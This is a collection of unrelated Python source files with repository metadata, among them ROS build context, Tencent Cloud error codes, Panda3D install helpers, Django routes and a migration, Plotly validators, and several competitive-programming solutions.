ddbef986dae907d2050b594e370f2184388f1920
e7c70a02e61f6d4a97c5933f3550bca22afa6acb
/ros_ws/build/learning_ros/Part_1/custom_msgs/cmake/custom_msgs-genmsg-context.py
cdf5cb754534d19022baa9bb108ca94f21ca075e
[]
no_license
amitf82/Final_Proj_Mobile_Robotics
14cfe7b182df1294a873283c91688c8ca9526fee
435a6c1562df030fc462fe1b0a84f968a27a2b85
refs/heads/master
2021-01-20T03:22:51.387095
2017-04-30T08:25:33
2017-04-30T08:25:33
89,532,221
0
0
null
null
null
null
UTF-8
Python
false
false
639
py
# generated from genmsg/cmake/pkg-genmsg.context.in messages_str = "/home/user/ros_ws/src/learning_ros/Part_1/custom_msgs/msg/VecOfDoubles.msg" services_str = "" pkg_name = "custom_msgs" dependencies_str = "roscpp;std_msgs" langs = "gencpp;genlisp;genpy" dep_include_paths_str = "custom_msgs;/home/user/ros_ws/src/learning_ros/Part_1/custom_msgs/msg;roscpp;/opt/ros/indigo/share/roscpp/cmake/../msg;std_msgs;/opt/ros/indigo/share/std_msgs/cmake/../msg" PYTHON_EXECUTABLE = "/usr/bin/python" package_has_static_sources = '' == 'TRUE' genmsg_check_deps_script = "/opt/ros/indigo/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
f69ccb7f33652833c315b76a7a2d83e1524f1e29
4dfd539c530c5cff6874f2fa0c06ffd893212ad3
/tencentcloud/yunjing/v20180228/errorcodes.py
c9d51af5bf9ec25e5d48a99b9a144f01510b9ba7
[]
no_license
TencentCloud/tencentcloud-sdk-python-intl-en
aac605d1a0458b637ba29eb49f6f166fe844a269
042b4d7fb609d4d240728197901b46008b35d4b0
refs/heads/master
2023-09-01T19:39:27.436454
2023-09-01T04:02:15
2023-09-01T04:02:15
227,834,644
4
6
null
2023-07-17T08:56:56
2019-12-13T12:23:52
Python
UTF-8
Python
false
false
3,195
py
# -*- coding: utf8 -*- # Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # The agent is offline. FAILEDOPERATION_AGENTOFFLINE = 'FailedOperation.AgentOffline' # Failed to deactivate CWP Pro. FAILEDOPERATION_CLOSEPROVERSION = 'FailedOperation.CloseProVersion' # Failed to create a port acquisition task. FAILEDOPERATION_CREATEOPENPORTTASK = 'FailedOperation.CreateOpenPortTask' # Failed to create a real-time process acquisition task. FAILEDOPERATION_CREATEPROCESSTASK = 'FailedOperation.CreateProcessTask' # Failed to export. FAILEDOPERATION_EXPORT = 'FailedOperation.Export' # The server was uninstalled. FAILEDOPERATION_MACHINEDELETE = 'FailedOperation.MachineDelete' # The real-time port pulling task does not exist. FAILEDOPERATION_OPENPORTTASKNOTFOUND = 'FailedOperation.OpenPortTaskNotFound' # Failed to activate CWP Pro. FAILEDOPERATION_OPENPROVERSION = 'FailedOperation.OpenProVersion' # Failed to isolate all or part of servers. FAILEDOPERATION_PARTSEPARATE = 'FailedOperation.PartSeparate' # Unable to disable the prepaid Pro edition. Please disable it in Billing Center. FAILEDOPERATION_PREPAYMODE = 'FailedOperation.PrePayMode' # The real-time process pulling task does not exist. FAILEDOPERATION_PROCESSTASKNOTFOUND = 'FailedOperation.ProcessTaskNotFound' # Failed to recover the trojan. FAILEDOPERATION_RECOVER = 'FailedOperation.Recover' # Failed to scan for vulnerabilities again. FAILEDOPERATION_RESCANVUL = 'FailedOperation.RescanVul' # The server already has a rescan task in progress. FAILEDOPERATION_RESCANVULPROCESSINUSE = 'FailedOperation.RescanVulProcessInUse' # Failed to isolate a single server. FAILEDOPERATION_SINGLESEPARATE = 'FailedOperation.SingleSeparate' # Internal error. INTERNALERROR = 'InternalError' # The time range format is incorrect. INVALIDPARAMETER_DATERANGE = 'InvalidParameter.DateRange' # Invalid request. INVALIDPARAMETER_ILLEGALREQUEST = 'InvalidParameter.IllegalRequest' # Incorrect parameter format. INVALIDPARAMETER_INVALIDFORMAT = 'InvalidParameter.InvalidFormat' # Missing parameter. INVALIDPARAMETER_MISSINGPARAMETER = 'InvalidParameter.MissingParameter' # Parameter parsing error. INVALIDPARAMETER_PARSINGERROR = 'InvalidParameter.ParsingError' # The tag name cannot contain more than 15 characters. INVALIDPARAMETERVALUE_TAGNAMELENGTHLIMIT = 'InvalidParameterValue.TagNameLengthLimit' # The maximum number of entries to be added in batches is exceeded. LIMITEXCEEDED_AREAQUOTA = 'LimitExceeded.AreaQuota' # Missing parameter. MISSINGPARAMETER = 'MissingParameter' # The resource does not exist. RESOURCENOTFOUND = 'ResourceNotFound'
004a5ea7c590722cada44dc62d7244160bdbb780
ce2e74d15fa3159b596eae72bb4f0e2a96006c29
/The_Basics/Chapter14/testerr.py
45b8cca05254dd9de0a9d941064e370a36f470a2
[]
no_license
cametan001/Learning_to_Program
595fcd0d97b22abb9904957012fbed95c835426c
322716089025d2b21533aff9de33c18099eb30cb
refs/heads/master
2016-09-15T20:20:48.185428
2010-11-11T14:26:47
2010-11-11T14:26:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
152
py
# -*- coding: utf-8 -*- from raiserr import * try: print div42() except ZeroDivisionError: print "0以外の値を入力してください。"
f3a6c973676ba8b267b8fa1e5199895b9be7deb1
ba0cbdae81c171bd4be7b12c0594de72bd6d625a
/MyToontown/Panda3D-1.9.0/direct/pyinst/installutils.py
66eca013464126d08d7eeba3bad65df0cecb3bb2
[ "BSD-3-Clause", "BSD-2-Clause" ]
permissive
sweep41/Toontown-2016
65985f198fa32a832e762fa9c59e59606d6a40a3
7732fb2c27001264e6dd652c057b3dc41f9c8a7d
refs/heads/master
2021-01-23T16:04:45.264205
2017-06-04T02:47:34
2017-06-04T02:47:34
93,279,679
0
0
null
null
null
null
UTF-8
Python
false
false
2,790
py
# copyright 1999 McMillan Enterprises, Inc. # demo code - use as you please. import os import stat def copyFile(srcFiles, destFile, append=0): ''' Copy one or more files to another file. If srcFiles is a list, then all will be concatenated together to destFile. The append flag is also valid for single file copies. destFile will have the mode, ownership and timestamp of the last file copied/appended. ''' if type(srcFiles) == type([]): # in case we need to overwrite on the first file... copyFile(srcFiles[0], destFile, append) for file in srcFiles[1:]: copyFile(file, destFile, 1) return mode = 'wb' if append: mode = 'ab' print " ", srcFiles, "->", input = open(srcFiles, 'rb') if input: print destFile output = open(destFile, mode) while 1: bytesRead = input.read(8192) if bytesRead: output.write(bytesRead) else: break input.close() output.close() stats = os.stat(srcFiles) os.chmod(destFile, stats[stat.ST_MODE]) try: # FAT16 file systems have only one file time os.utime(destFile, (stats[stat.ST_ATIME], stats[stat.ST_MTIME])) except: pass try: os.chown(destFile, stats[stat.ST_UID], stats[stat.ST_GID]) except: pass def ensure(dirct): dirnm = dirct plist = [] try: while not os.path.exists(dirnm): dirnm, base = os.path.split(dirnm) if base == '': break plist.insert(0, base) for d in plist: dirnm = os.path.join(dirnm, d) os.mkdir(dirnm) except: return 0 return 1 def getinstalldir(prompt="Enter an installation directory: "): while 1: installdir = raw_input("Enter an installation directory: ") installdir = os.path.normpath(installdir) if ensure(installdir): break else: print installdir, "is not a valid pathname" r = raw_input("Try again (y/n)?: ") if r in 'nN': sys.exit(0) return installdir def installCArchive(nm, basedir, suffixdir): import carchive_rt fulldir = os.path.join(basedir, suffixdir) if ensure(fulldir): pkg = carchive_rt.CArchive(nm) for fnm in pkg.contents(): stuff = pkg.extract(fnm)[1] outnm = os.path.join(fulldir, fnm) if ensure(os.path.dirname(outnm)): open(outnm, 'wb').write(stuff) pkg = None os.remove(nm)
8c3aaaf2d9408dc92686db92188f28478d2d1435
33a32d7d7b482206852a7bbeb7fa507f55ca53dd
/models/category.py
3f0f824e93bb71a744c8707273430117db463718
[]
no_license
stanislawK/bookshelf
94277b0103b522302782c3a5fed9e4c790d6f86f
fa68dda7f88c83080ad9a51a1ed16994b2bca054
refs/heads/master
2020-05-21T18:44:14.396967
2019-05-20T10:04:06
2019-05-20T10:04:06
186,138,290
0
0
null
2019-05-20T08:11:44
2019-05-11T13:47:42
Python
UTF-8
Python
false
false
494
py
from bookshelf.extensions import db class CategoryModel(db.Model): __tablename__ = 'categories' id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(50), nullable=False) @classmethod def find_by_name(cls, _name): return cls.query.filter_by(name=_name).first() @classmethod def find_by_id(cls, _id): return cls.query.filter_by(id=_id).first() def save_to_db(self): db.session.add(self) db.session.commit()
4f0372e774eb8b7d1ce6d898124f7ccc4c782e29
d41d18d3ea6edd2ec478b500386375a8693f1392
/plotly/validators/contourcarpet/colorbar/tickfont/_family.py
15aef26e53e16075df0e8f184ac20f62ac43a276
[ "MIT" ]
permissive
miladrux/plotly.py
38921dd6618650d03be9891d6078e771ffccc99a
dbb79e43e2cc6c5762251537d24bad1dab930fff
refs/heads/master
2020-03-27T01:46:57.497871
2018-08-20T22:37:38
2018-08-20T22:37:38
145,742,203
1
0
MIT
2018-08-22T17:37:07
2018-08-22T17:37:07
null
UTF-8
Python
false
false
514
py
import _plotly_utils.basevalidators class FamilyValidator(_plotly_utils.basevalidators.StringValidator): def __init__( self, plotly_name='family', parent_name='contourcarpet.colorbar.tickfont', **kwargs ): super(FamilyValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type='colorbars', no_blank=True, role='style', strict=True, **kwargs )
6988d0bf81d29b125be98f70f357cda2d3f89cd1
6ab810f6ca51dc2e2d0b7197fc1866b738ca70a2
/Contest/WC213/5555.统计字典序元音字符串的数目.py
eb45f72780ddd673963c0da027b281fa4e3be4db
[ "MIT" ]
permissive
ApocalypseMac/LeetCode
2309223be0c3e2969850cf1770eef2a447d39317
84c229eaf5a2e617ca00cabed04dd76d508d60b8
refs/heads/master
2023-04-14T19:22:34.340333
2021-03-28T05:20:40
2021-03-28T05:20:40
282,896,723
1
2
MIT
2020-07-29T05:05:19
2020-07-27T12:49:40
Python
UTF-8
Python
false
false
310
py
class Solution: def countVowelStrings(self, n: int) -> int: dp = [[0] * 5 for _ in range(n + 1)] for i in range(n + 1): dp[i][0] = 1 for i in range(1, n + 1): for j in range(1, 5): dp[i][j] = dp[i-1][j] + dp[i][j-1] return sum(dp[-1])
0d6c5c1c8e12278419687cd92ee29fc5328e85ba
f12770add2dd48d2262612fcb1aaecc4a714b4fb
/django/remoteomd/remoteomddata/api/urls.py
8080bdec717ba226682f54440bf918ee6f7351af
[]
no_license
github188/vending
3558666b57b37e843e72d194d80f6a8ef5dbc7a4
ce3e2f1fcbb4d132f7b01a99400d917d7ca174a6
refs/heads/master
2021-06-16T09:54:09.214694
2017-01-28T01:31:30
2017-01-28T01:31:30
null
0
0
null
null
null
null
UTF-8
Python
false
false
9,722
py
from django.conf.urls import url, include from rest_framework.authtoken import views from remoteomddata.api.views.coinmachine import CoinChangeListAPIView, CoinChangeCreateAPIView, CoinChangeDetailAPIView, \ CoinChangeUpdateAPIView, CoinChangeDeleteAPIView from remoteomddata.api.views.config import ConfigListAPIView, ConfigCreateAPIView, ConfigDetailAPIView, \ ConfigUpdateAPIView, ConfigDeleteAPIView from remoteomddata.api.views.group import GroupListAPIView, GroupCreateAPIView, GroupDetailAPIView, GroupUpdateAPIView, \ GroupDeleteAPIView from remoteomddata.api.views.member import MemberListAPIView, MemberCreateAPIView, MemberDetailAPIView, \ MemberUpdateAPIView, MemberDeleteAPIView from remoteomddata.api.views.moneycharge import MoneyChargeListAPIView, MoneyChargeCreateAPIView, \ MoneyChargeDetailAPIView, MoneyChargeUpdateAPIView, MoneyChargeDeleteAPIView from remoteomddata.api.views.ordermain import OrderMainDeleteAPIView, OrderMainUpdateAPIView, OrderMainDetailAPIView, \ OrderMainCreateAPIView, OrderMainListAPIView from remoteomddata.api.views.permission.permissionview import adminPermView from remoteomddata.api.views.product import ProductListAPIView, ProductCreateAPIView, ProductDetailAPIView, \ ProductUpdateAPIView, ProductDeleteAPIView from remoteomddata.api.views.productcategory import ProductCategoryListAPIView, ProductCategoryCreateAPIView, \ ProductCategoryDetailAPIView, ProductCategoryUpdateAPIView, ProductCategoryDeleteAPIView from remoteomddata.api.views.productprovider import ProductProviderListAPIView, ProductProviderCreateAPIView, \ ProductProviderDetailAPIView, ProductProviderUpdateAPIView, ProductProviderDeleteAPIView from remoteomddata.api.views.slot import SlotListAPIView, SlotCreateAPIView, SlotDetailAPIView, SlotUpdateAPIView, \ SlotDeleteAPIView from remoteomddata.api.views.slotstatus import SlotStatusListAPIView, SlotStatusCreateAPIView, SlotStatusDetailAPIView, \ SlotStatusUpdateAPIView, SlotStatusDeleteAPIView from remoteomddata.api.views.user import UserListAPIView, UserCreateAPIView, UserDetailAPIView, UserUpdateAPIView, \ UserDeleteAPIView from remoteomddata.api.views.vendingmachine import VendingMachineListAPIView, VendingMachineCreateAPIView, \ VendingMachineDetailAPIView, VendingMachineUpdateAPIView, VendingMachineDeleteAPIView from remoteomddata.api.views.vendingmachinetype import VendingMachineTypeListAPIView, VendingMachineTypeCreateAPIView, \ VendingMachineTypeDetailAPIView, VendingMachineTypeUpdateAPIView, VendingMachineTypeDeleteAPIView urlpatterns = [ url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')), url(r'^api-token-auth/', views.obtain_auth_token, name='rest_framework_token'), url(r'^perm/$', adminPermView, name='api-perm'), url(r'^moneycharge/$', MoneyChargeListAPIView.as_view(), name='moneycharge'), url(r'^moneycharge/create/$', MoneyChargeCreateAPIView.as_view(), name='moneycharge-create'), url(r'^moneycharge/(?P<id>[\w-]+)/$', MoneyChargeDetailAPIView.as_view(), name='moneycharge-detail'), url(r'^moneycharge/edit/(?P<id>[\w-]+)/$', MoneyChargeUpdateAPIView.as_view(), name='moneycharge-update'), url(r'^moneycharge/delete/(?P<id>[\w-]+)/$', MoneyChargeDeleteAPIView.as_view(), name='moneycharge-delete'), url(r'^group/$', GroupListAPIView.as_view(), name='group'), url(r'^group/create/$', GroupCreateAPIView.as_view(), name='group-create'), url(r'^group/(?P<id>[\w-]+)/$', GroupDetailAPIView.as_view(), name='group-detail'), url(r'^group/edit/(?P<id>[\w-]+)/$', GroupUpdateAPIView.as_view(), name='group-update'), url(r'^group/delete/(?P<id>[\w-]+)/$', GroupDeleteAPIView.as_view(), name='group-delete'), url(r'^ordermain/$', OrderMainListAPIView.as_view(), name='ordermain'), url(r'^ordermain/create/$', OrderMainCreateAPIView.as_view(), name='ordermain-create'), url(r'^ordermain/(?P<id>[\w-]+)/$', OrderMainDetailAPIView.as_view(), name='ordermain-detail'), url(r'^ordermain/edit/(?P<id>[\w-]+)/$', OrderMainUpdateAPIView.as_view(), name='ordermain-update'), url(r'^ordermain/delete/(?P<id>[\w-]+)/$', OrderMainDeleteAPIView.as_view(), name='ordermain-delete'), url(r'^product/$', ProductListAPIView.as_view(), name='product'), url(r'^product/create/$', ProductCreateAPIView.as_view(), name='product-create'), url(r'^product/(?P<id>[\w-]+)/$', ProductDetailAPIView.as_view(), name='product-detail'), url(r'^product/edit/(?P<id>[\w-]+)/$', ProductUpdateAPIView.as_view(), name='product-update'), url(r'^product/delete/(?P<id>[\w-]+)/$', ProductDeleteAPIView.as_view(), name='product-delete'), url(r'^productcategory/$', ProductCategoryListAPIView.as_view(), name='productcategory'), url(r'^productcategory/create/$', ProductCategoryCreateAPIView.as_view(), name='productcategory-create'), url(r'^productcategory/(?P<id>[\w-]+)/$', ProductCategoryDetailAPIView.as_view(), name='productcategory-detail'), url(r'^productcategory/edit/(?P<id>[\w-]+)/$', ProductCategoryUpdateAPIView.as_view(), name='productcategory-update'), url(r'^productcategory/delete/(?P<id>[\w-]+)/$', ProductCategoryDeleteAPIView.as_view(), name='productcategory-delete'), url(r'^productprovider/$', ProductProviderListAPIView.as_view(), name='productprovider'), url(r'^productprovider/create/$', ProductProviderCreateAPIView.as_view(), name='productprovider-create'), url(r'^productprovider/(?P<id>[\w-]+)/$', ProductProviderDetailAPIView.as_view(), name='productprovider-detail'), url(r'^productprovider/edit/(?P<id>[\w-]+)/$', ProductProviderUpdateAPIView.as_view(), name='productprovider-update'), url(r'^productprovider/delete/(?P<id>[\w-]+)/$', ProductProviderDeleteAPIView.as_view(), name='productprovider-delete'), url(r'^slot/$', SlotListAPIView.as_view(), name='slot'), url(r'^slot/create/$', SlotCreateAPIView.as_view(), name='slot-create'), url(r'^slot/(?P<id>[\w-]+)/$', SlotDetailAPIView.as_view(), name='slot-detail'), url(r'^slot/edit/(?P<id>[\w-]+)/$', SlotUpdateAPIView.as_view(), name='slot-update'), url(r'^slot/delete/(?P<id>[\w-]+)/$', SlotDeleteAPIView.as_view(), name='slot-delete'), url(r'^slotstatus/$', SlotStatusListAPIView.as_view(), name='slot'), url(r'^slotstatus/create/$', SlotStatusCreateAPIView.as_view(), name='slot-create'), url(r'^slotstatus/(?P<id>[\w-]+)/$', SlotStatusDetailAPIView.as_view(), name='slot-detail'), url(r'^slotstatus/edit/(?P<id>[\w-]+)/$', SlotStatusUpdateAPIView.as_view(), name='slot-update'), url(r'^slotstatus/delete/(?P<id>[\w-]+)/$', SlotStatusDeleteAPIView.as_view(), name='slot-delete'), url(r'^user/$', UserListAPIView.as_view(), name='user'), url(r'^user/create/$', UserCreateAPIView.as_view(), name='user-create'), url(r'^user/(?P<id>[\w-]+)/$', UserDetailAPIView.as_view(), name='user-detail'), url(r'^user/edit/(?P<id>[\w-]+)/$', UserUpdateAPIView.as_view(), name='user-update'), url(r'^user/delete/(?P<id>[\w-]+)/$', UserDeleteAPIView.as_view(), name='user-delete'), url(r'^member/$', MemberListAPIView.as_view(), name='member'), url(r'^member/create/$', MemberCreateAPIView.as_view(), name='member-create'), url(r'^member/(?P<id>[\w-]+)/$', MemberDetailAPIView.as_view(), name='member-detail'), url(r'^member/edit/(?P<id>[\w-]+)/$', MemberUpdateAPIView.as_view(), name='member-update'), url(r'^member/delete/(?P<id>[\w-]+)/$', MemberDeleteAPIView.as_view(), name='member-delete'), url(r'^vendingmachine/$', VendingMachineListAPIView.as_view(), name='vendingmachine'), url(r'^vendingmachine/create/$', VendingMachineCreateAPIView.as_view(), name='vendingmachine-create'), url(r'^vendingmachine/(?P<id>[\w-]+)/$', VendingMachineDetailAPIView.as_view(), name='vendingmachine-detail'), url(r'^vendingmachine/edit/(?P<id>[\w-]+)/$', VendingMachineUpdateAPIView.as_view(), name='vendingmachine-update'), url(r'^vendingmachine/delete/(?P<id>[\w-]+)/$', VendingMachineDeleteAPIView.as_view(), name='vendingmachine-delete'), url(r'^vendingmachinetype/$', VendingMachineTypeListAPIView.as_view(), name='vendingmachinetype'), url(r'^vendingmachinetype/create/$', VendingMachineTypeCreateAPIView.as_view(), name='vendingmachinetype-create'), url(r'^vendingmachinetype/(?P<id>[\w-]+)/$', VendingMachineTypeDetailAPIView.as_view(), name='vendingmachinetype-detail'), url(r'^vendingmachinetype/edit/(?P<id>[\w-]+)/$', VendingMachineTypeUpdateAPIView.as_view(), name='vendingmachinetype-update'), url(r'^vendingmachinetype/delete/(?P<id>[\w-]+)/$', VendingMachineTypeDeleteAPIView.as_view(), name='vendingmachinetype-delete'), url(r'^config/$', ConfigListAPIView.as_view(), name='config'), url(r'^config/create/$', ConfigCreateAPIView.as_view(), name='config-create'), url(r'^config/(?P<id>[\w-]+)/$', ConfigDetailAPIView.as_view(), name='config-detail'), url(r'^config/(?P<id>[\w-]+)/edit/$', ConfigUpdateAPIView.as_view(), name='config-update'), url(r'^config/(?P<id>[\w-]+)/delete/$', ConfigDeleteAPIView.as_view(), name='config-delete'), url(r'^coinchangelog/$', CoinChangeListAPIView.as_view(), name='coinchange'), url(r'^coinchangelog/create/$', CoinChangeCreateAPIView.as_view(), name='coinchange-create'), url(r'^coinchangelog/(?P<id>[\w-]+)/$', CoinChangeDetailAPIView.as_view(), name='coinchange-detail'), url(r'^coinchangelog/edit/(?P<id>[\w-]+)/$', CoinChangeUpdateAPIView.as_view(), name='coinchange-update'), url(r'^coinchangelog/delete/(?P<id>[\w-]+)/$', CoinChangeDeleteAPIView.as_view(), name='coinchange-delete'), ]
5a2519e963859ae158490a2f5abc861b2d5ddaed
9805edf2b923c74cf72a3cfb4c2c712255256f15
/python/041_first_missing_positive.py
00bc37e88ed085cdb52e6a5065ea4211b936dbd3
[ "MIT" ]
permissive
jixinfeng/leetcode-soln
5b28e49c2879cdff41c608fc03628498939b0e99
24cf8d5f1831e838ea99f50ce4d8f048bd46c136
refs/heads/master
2022-10-12T17:02:53.329565
2022-10-06T03:21:56
2022-10-06T03:21:56
69,371,757
0
1
null
null
null
null
UTF-8
Python
false
false
1,004
py
""" Given an unsorted integer array, find the first missing positive integer. For example, Given [1,2,0] return 3, and [3,4,-1,1] return 2. Your algorithm should run in O(n) time and uses constant space. """ class Solution(object): def firstMissingPositive(self, nums): """ :type nums: List[int] :rtype: int """ if nums is None or nums == []: return 1 i = 0 n = len(nums) while i < n: if nums[i] > 0 and nums[i] < n and nums[i] != nums[nums[i] - 1]: nums[nums[i] - 1], nums[i] = nums[i], nums[nums[i] - 1] else: i += 1 for i in range(n): if nums[i] != i + 1: return i + 1 return n + 1 a = Solution() assert a.firstMissingPositive([1,2,0]) == 3 assert a.firstMissingPositive([3,4,-1,1]) == 2 assert a.firstMissingPositive([2]) == 1 assert a.firstMissingPositive([1,1]) == 2 assert a.firstMissingPositive([1000,-1]) == 1
61b010f0c53d635bc3d60ea40135546e539a1c46
60e4baae4d6b323b3d3b656df3a7b0ea3ca40ef2
/project/apps/content/migrations/0011_auto_20180112_0303.py
45634aba944d38cfd3ac6dae8c65c055ac45551b
[]
no_license
Burzhun/Big-django-project
a03a61a15ee75f49324ad7ea51372b6b013d1650
1a71f974b7b5399a45862711b5f858c0d4af50d2
refs/heads/master
2020-04-11T00:16:06.211039
2018-12-11T19:13:38
2018-12-11T19:13:38
161,381,283
0
0
null
null
null
null
UTF-8
Python
false
false
1,266
py
# -*- coding: utf-8 -*- # Generated by Django 1.11.9 on 2018-01-12 03:03 from __future__ import unicode_literals from django.utils import timezone from django.db import migrations from itertools import chain import json def migrate_published_dates(apps, schema_editor): article_pages = apps.get_model('content', 'ArticlePage').objects.all() news_pages = apps.get_model('content', 'NewsPage').objects.all() blog_pages = apps.get_model('content', 'BlogPage').objects.all() for page in chain(article_pages, news_pages, blog_pages): page.published_at = page.go_live_at page.go_live_at = None page.save() revision = page.revisions.order_by('-created_at', '-id').first() if not revision: continue content_json = json.loads(revision.content_json) content_json["published_at"] = str(page.published_at) try: del content_json["go_live_at"] except: pass revision.content_json = json.dumps(content_json) revision.save() class Migration(migrations.Migration): dependencies = [ ('content', '0010_auto_20180112_0254'), ] operations = [ migrations.RunPython(migrate_published_dates), ]
c09e01caaebea0f93a9e3aa35d47a7ed3b477620
d96787f92bd86c8d8bcf01a4e7ec8f7feec24194
/kattis/acm/solution.py
26e0a74268c2f86a516dd1d097fcb4055afcc15e
[]
no_license
iandioch/solutions
133cbc3af58fadcde0b2e981fb0e7d05801070a7
8b3e458b3c01179ddf776bfbb897f263f22f3693
refs/heads/master
2023-04-09T03:39:16.952817
2023-03-15T20:00:53
2023-03-15T20:00:53
47,693,495
48
40
null
2019-10-22T14:52:59
2015-12-09T13:36:55
Python
UTF-8
Python
false
false
477
py
solved = {} # map question to time solved tries_before_solving = {} while True: p = input().split() if len(p) == 1: break time = int(p[0]) q = p[1] if q in solved: continue if q in tries_before_solving: tries_before_solving[q] += 1 else: tries_before_solving[q] = 1 if p[2] == 'right': solved[q] = time print(len(solved), end=' ') print(sum([solved[x] + 20*(tries_before_solving[x]-1) for x in solved]))